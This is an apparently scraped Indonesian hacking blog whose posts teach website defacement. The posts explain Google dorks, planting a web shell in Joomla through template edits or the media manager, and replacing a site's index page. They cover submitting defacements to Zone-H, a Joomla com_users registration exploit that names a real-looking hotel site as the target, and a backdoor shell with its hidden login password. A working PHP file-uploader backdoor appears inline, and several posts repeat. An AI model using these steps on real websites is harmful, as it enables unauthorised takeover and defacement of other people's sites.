Ringkasan ini tidak tersedia. Harap
klik di sini untuk melihat postingan.
Pengertian dan Fungsi Google Dork
Dalam dunia maya, Istilah Google Dork tidak asing lagi bagi kita,
mungkin sering kita dengar, tapi tidak tau apa maksudnya.
Google Dork adalah kata kunci dalam mempermudah pencarian data,
bahkan kita juga dapat melihat password yang tersembunyi dalam suatu data.(itu jika kamu pintar mengkreasikan dork :p )
Google dork juga bisa dikategorikan sebagai senjata berbahaya para hacker.
Bagian-bagian google dork :
1. -intitle
-allintitle
Berfungsi untuk mencari judul pada suatu web
2 .-intext
-allintext
Berfungsi untuk mencari suatu text dalam terkandung dalam web
3. site
Berfungsi untuk mencari site/domain tertentu suatu web (com,sch.id,au dll)
4. -inurl
-allinurl
Berfungsi mencari string yang terdapat pada url
5. -filetype
Berfungsi mencari jenis file yang spesifik
Contoh menggunakan Google Dork
intitle:siswa site:sch.id
Maksud dari intite:siswa berarti, kita sedang mencari data yang berjudul "siswa''
dan site:sch.id adalah site sekolah yang berakhiran sch.id
Dalam mengunakan Google dork sebenarnya sangat mudah, kita hanya perlu mengkreasikannya
agar apa yang kita cari di search engine google dapat kita temukan dengat cepat.
Oke, sekian dulu yah semoga bisa bermanfaat :)
Cara Mudah Menanam Shell & Tebas Index Web Joomla
Langsung ajah :D
Pada tutorial saya kali ini, saya akan shere bagaimana cara mengupload shell
ke web joomla.
Alat dan bahan
- Shell (Wajib) kalau blum punya download di SINI
Itu ajah :D :D
[#] Mengupload shell lewat Template
1. Pilih template manager
2. kemudian klik Template ( 1 ), pilih salah satu template di situ,
di sini saya memilih template Atomic ( 2 ), klik template tersebut
3. Pilih Edit main page template
Nanti akan muncul seperti ini :
Cara memanggil shell : http://site.com/templates/atomic/index.php
[#] Mengupload shell lewat template administrator
1. Pilih Template
2. Lihat template yang aktif ( terdapat tanda bintang ),
3. Kemudian pilih Templates, lihat gbr :
4. Klik template terssebut, kemudian pilih Edit main page template
5. Sisipkan Script berikut pada kolom editornya :
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
else { echo '<b>Gagal Upload!!!</b><br><br>'; }
}
?>
Lalu save.
Jika berhasil, akan muncul kotak upload, lihat gbr
6. Upload shell kamu di situ. jika berhasil mengupload shell, akan muncul Upload sukses,
Cara memanggil shell : http://site.com/administrator/namashell.php
[#] Mengupload shell lewat Media Manager
1. pilih media manager
2. Pilih options, nanti akan muncul seperti ini :
3. Tambahkan php pada kotak Legal Extension, kemudian save
4.Sekarang, upload shell kamu
Cara memanggil Shell : http://site.com/images/namashell.php
Jika sudah tanam shell/backdoor, Sekarang kita akan mengganti Index/halaman utama Web tersebut.
1. Masuk ke Shell kamu.
2.Cari Index.php lalu pilih edit
3.Hapus semua script lalu pastekan Script Deface Kamu di kotak tersebut, lalu Save
4. Jika berhasil, Script deface kamu akan muncul di halaman utama web.
Gampang-gampang susah kan :D
oke, sekian dulu yah, semoga bermanfaat
PERHATIAN
Resiko tanggung sendiri,
Admin hanya sekedar berbagi
Cara Submit hasil Deface di Zone-H
Hello Para defacer Indonesia, Apa ilmu kalian sudah Bertambah ??? :D
Nah.. Ni pengetahuan baru buat kalian, bagi yang belum tau ajah yah :)
Tau kan apa itu Zone-H dan apa fungsi dari Zone-H, Kalo belum tau !
Sana.... ke Google ajah :p
Oke langsung ajah
1. buka Zone-H di Alamat website www.zone-h.org
2. Pilih Tab Notify
3. Isi :
Notifier : Nick Kamu
Domain 1 : Url Hasil Deface kamu
Kolom ke 3 : Teknik/cara Mendeface Web tersebut, kalo bingung Pilih Sembarang ajah :D
Kolom ke 4 : Tujuan kamu mendeface Web tersebut,
Kemudian Send
Jika Hasil Deface Kamu Lebih Dari 1, Di bagian bawah tab kamu Klik Mass (di samping Single)
Kemudia Isi dengan cara yang ada di langkah ke 3 . Lalu Send
Jika Hasilnya Error berarti web tersebut sudah pernah di deface, dan sudah pernah di submit sebelumnya
Jika Hasilnya Ok berarti Berhasil, (Belum pernah di submit sebelumnya)
Sekarang tinggal tunggu Persetujuan :D
Oke Sekian dari saya, semoga bisa bermanfaat
Salam..
Nah.. Ni pengetahuan baru buat kalian, bagi yang belum tau ajah yah :)
Tau kan apa itu Zone-H dan apa fungsi dari Zone-H, Kalo belum tau !
Sana.... ke Google ajah :p
Oke langsung ajah
1. buka Zone-H di Alamat website www.zone-h.org
2. Pilih Tab Notify
3. Isi :
Notifier : Nick Kamu
Domain 1 : Url Hasil Deface kamu
Kolom ke 3 : Teknik/cara Mendeface Web tersebut, kalo bingung Pilih Sembarang ajah :D
Kolom ke 4 : Tujuan kamu mendeface Web tersebut,
Kemudian Send
Jika Hasil Deface Kamu Lebih Dari 1, Di bagian bawah tab kamu Klik Mass (di samping Single)
Kemudia Isi dengan cara yang ada di langkah ke 3 . Lalu Send
Jika Hasilnya Error berarti web tersebut sudah pernah di deface, dan sudah pernah di submit sebelumnya
Jika Hasilnya Ok berarti Berhasil, (Belum pernah di submit sebelumnya)
Sekarang tinggal tunggu Persetujuan :D
Oke Sekian dari saya, semoga bisa bermanfaat
Salam..
Deface Website Dengan Teknik COM USER ( Exploit Joomla )
DEFACE
Secara singkat Deface adalah kegiatan untuk mengganti ataupun
merubah tampilan halaman depan sebuah situs,
Teknik ini biasa di lakukan oleh para hacker. Tapi banyak yang berpendapat,
seorang defacer bukanlah hacker, True (y)
Okelah, Kali ini saya akan berbagi Ilmu Dunia Defacer,
Sebenarnya teknik ini sudah lama. tapi karena targetnya masih banyak,
dan masih berkeliaran di mana-mana yah ngak apa-apakan di shere :))
Oke langsung ajah...
Alat dan Bahan
[+] Expoit Joomla Com User : Download
[+] Dork :
-intitle:About Home Page inurl:index.php? site:.com
-intitle:Home intext:About Joomla! This site site:com
-intitle:Home intext:Getting Started site:com
-intext: Site Administrator intitle:Contact
-intext:Joomla! - the dynamic portal engine and content management system site:.com
dan masih banyak lagi. Silakan dork di kembangkan sendiri :)
Site bisa di ganti sesuai dengan site negara keinginan kamu
Kalau belum hafal Alamat/Site google seluruh dunia silakan lihat di SINI
[+] Exploit : /index.php?option=com_users&view=registration
1. Oke, sekarang cari target dengan dork di atas,
Saya ambil contoh target : www.hotel-splendide.com, Ubah menjadi
www.hotel-splendide.com/index.php?option=com_users&view=registration
Maka akan di bawah ke halaman registration
Lihat gbr :
2. Sekarang tekan ctrl+u akan muncul seperti gbr di bawah kemudia tekan ctrl+f cari kata hidden
3. Sekarang buka Buka Exploit Joomla yg kamu download tadi (Buka dengan Notepad), jangan lupa di edit dulu, lihat bgr :
Ket : - usernamekamu1 & usernamekamu2 ( 1 & 2 ) silakan di ganti Terserah kamu, Username1 dan
username2 harus berbeda
- emailkamu@gmail.com ( 3 & 4 ) Ganti dengan email kamu,
Setelah di edit copy kode yang ada di kotak merah, lihat gbr :
Pada kotak No.1 (paling atas) kode yang di dapat seperti ini
/index.php/en/component/users/?task=registration.register
Tambahkan Site target di depan kode tadi, seperti ini
www.hotel-splendide.com/index.php/en/component/users/?task=registration.register
Kemudian paste pada Exploit Joomla yg sudah kamu edit tadi, seperti ini
Lalu Save !
4. Buka file Exploit Joomla dengan browser, lalu klik REGISTER
5. Setelah itu akan muncul Peringatan bahwa Password harus sama, Masukkan password kamu.
7. Kemudian klik Register lagi. Akan muncul seperti ini :
8.Sekarang buka email kamu, nanti akan di kasih link aktivasi, lihat gbr :
9.Sekarang masuk ke login administratornya, tambahkan /administrator di belakang Alamat website Target
Seprti ini :
www.hotel-splendide.com/administrator/
Masukkan User & Password kamu,(User&pass ada di email aktivasi) Kemudian klik login
10. Jika sukses, akan muncul seperti ini:
Nah sekarang jadi admin. terserah deh mau di apain web nya :D
Note:
Teknik ini hanya berlaku pada Joomla Versi 1.6. 1.7. 2.5
Gunakan untuk kebaikan
Resiko tanggung sendiri :)
Sekian dari saya, semoga bisa membantu :))
Secara singkat Deface adalah kegiatan untuk mengganti ataupun
merubah tampilan halaman depan sebuah situs,
Teknik ini biasa di lakukan oleh para hacker. Tapi banyak yang berpendapat,
seorang defacer bukanlah hacker, True (y)
Okelah, Kali ini saya akan berbagi Ilmu Dunia Defacer,
Sebenarnya teknik ini sudah lama. tapi karena targetnya masih banyak,
dan masih berkeliaran di mana-mana yah ngak apa-apakan di shere :))
Oke langsung ajah...
Alat dan Bahan
[+] Expoit Joomla Com User : Download
[+] Dork :
-intitle:About Home Page inurl:index.php? site:.com
-intitle:Home intext:About Joomla! This site site:com
-intitle:Home intext:Getting Started site:com
-intext: Site Administrator intitle:Contact
-intext:Joomla! - the dynamic portal engine and content management system site:.com
dan masih banyak lagi. Silakan dork di kembangkan sendiri :)
Site bisa di ganti sesuai dengan site negara keinginan kamu
Kalau belum hafal Alamat/Site google seluruh dunia silakan lihat di SINI
[+] Exploit : /index.php?option=com_users&view=registration
1. Oke, sekarang cari target dengan dork di atas,
Saya ambil contoh target : www.hotel-splendide.com, Ubah menjadi
www.hotel-splendide.com/index.php?option=com_users&view=registration
Maka akan di bawah ke halaman registration
Lihat gbr :
2. Sekarang tekan ctrl+u akan muncul seperti gbr di bawah kemudia tekan ctrl+f cari kata hidden
3. Sekarang buka Buka Exploit Joomla yg kamu download tadi (Buka dengan Notepad), jangan lupa di edit dulu, lihat bgr :
Ket : - usernamekamu1 & usernamekamu2 ( 1 & 2 ) silakan di ganti Terserah kamu, Username1 dan
username2 harus berbeda
- emailkamu@gmail.com ( 3 & 4 ) Ganti dengan email kamu,
Setelah di edit copy kode yang ada di kotak merah, lihat gbr :
Pada kotak No.1 (paling atas) kode yang di dapat seperti ini
/index.php/en/component/users/?task=registration.register
Tambahkan Site target di depan kode tadi, seperti ini
www.hotel-splendide.com/index.php/en/component/users/?task=registration.register
Kemudian paste pada Exploit Joomla yg sudah kamu edit tadi, seperti ini
4. Buka file Exploit Joomla dengan browser, lalu klik REGISTER
5. Setelah itu akan muncul Peringatan bahwa Password harus sama, Masukkan password kamu.
8.Sekarang buka email kamu, nanti akan di kasih link aktivasi, lihat gbr :
9.Sekarang masuk ke login administratornya, tambahkan /administrator di belakang Alamat website Target
Seprti ini :
www.hotel-splendide.com/administrator/
10. Jika sukses, akan muncul seperti ini:
Nah sekarang jadi admin. terserah deh mau di apain web nya :D
Note:
Teknik ini hanya berlaku pada Joomla Versi 1.6. 1.7. 2.5
Gunakan untuk kebaikan
Resiko tanggung sendiri :)
Sekian dari saya, semoga bisa membantu :))
Download Shell 1n73ction V 3.3 [Special Edition]
Hello World :D
Kali ini saya akan berbagi Shell 1n73ction Versi terbaru
Yaitu 1n73ction V 3.3.
Tau kan Shell itu apa?
Secara Singkat Shell juga diartikan sebagai Backdoor (pintu belakang)
Oke, Langsung saja liat Penampakannya
Disini saya akan membagikan 2 macam Shell
Sebenarnya Shellnya Sama tapi yang membedakan hanya login Formnya :D
Shell 1n73ction V 3.3 Dengan Login Form
Download
Shell 1n73ction V 3.3 Dengan 404 Not Found (Pass:''1n73ction'')
Download
NB: Untuk Shell 1n73ction V 3.3 Dengan 404 Not Found
Saat login akan muncul 404 Not Found, pada V 3.2
Tinggal menekan tobol ''Tab'' login forumnya akan muncul
Tapi berbeda di V 3.3 ini Walaupun kita menekan Tab atau ctrl+a kita tidak akan mungkin menemukan login form tersebut
Untuk menemukan login formnya . pastekan kode berikut di belakang nama shell kamu
?cmd=../../exe/inject
Ex :
http://site.com/namashell.php
Ubah Menjadi :
http://site.com/namashell.php?cmd=../../exe/inject
Sekarang Tekan ''Tab'' akan muncul login Form
kemudian masukkan Pasword ''1n73ction'' tanpa tanda kutip.
gampang kan :D
Sekian dari saya.Semoga Bermanfaat.
Salam
Kali ini saya akan berbagi Shell 1n73ction Versi terbaru
Yaitu 1n73ction V 3.3.
Tau kan Shell itu apa?
Secara Singkat Shell juga diartikan sebagai Backdoor (pintu belakang)
Oke, Langsung saja liat Penampakannya
Disini saya akan membagikan 2 macam Shell
Sebenarnya Shellnya Sama tapi yang membedakan hanya login Formnya :D
Shell 1n73ction V 3.3 Dengan Login Form
Download
Shell 1n73ction V 3.3 Dengan 404 Not Found (Pass:''1n73ction'')
Download
NB: Untuk Shell 1n73ction V 3.3 Dengan 404 Not Found
Saat login akan muncul 404 Not Found, pada V 3.2
Tinggal menekan tobol ''Tab'' login forumnya akan muncul
Tapi berbeda di V 3.3 ini Walaupun kita menekan Tab atau ctrl+a kita tidak akan mungkin menemukan login form tersebut
Untuk menemukan login formnya . pastekan kode berikut di belakang nama shell kamu
?cmd=../../exe/inject
Ex :
http://site.com/namashell.php
Ubah Menjadi :
http://site.com/namashell.php?cmd=../../exe/inject
Sekarang Tekan ''Tab'' akan muncul login Form
kemudian masukkan Pasword ''1n73ction'' tanpa tanda kutip.
gampang kan :D
Sekian dari saya.Semoga Bermanfaat.
Salam
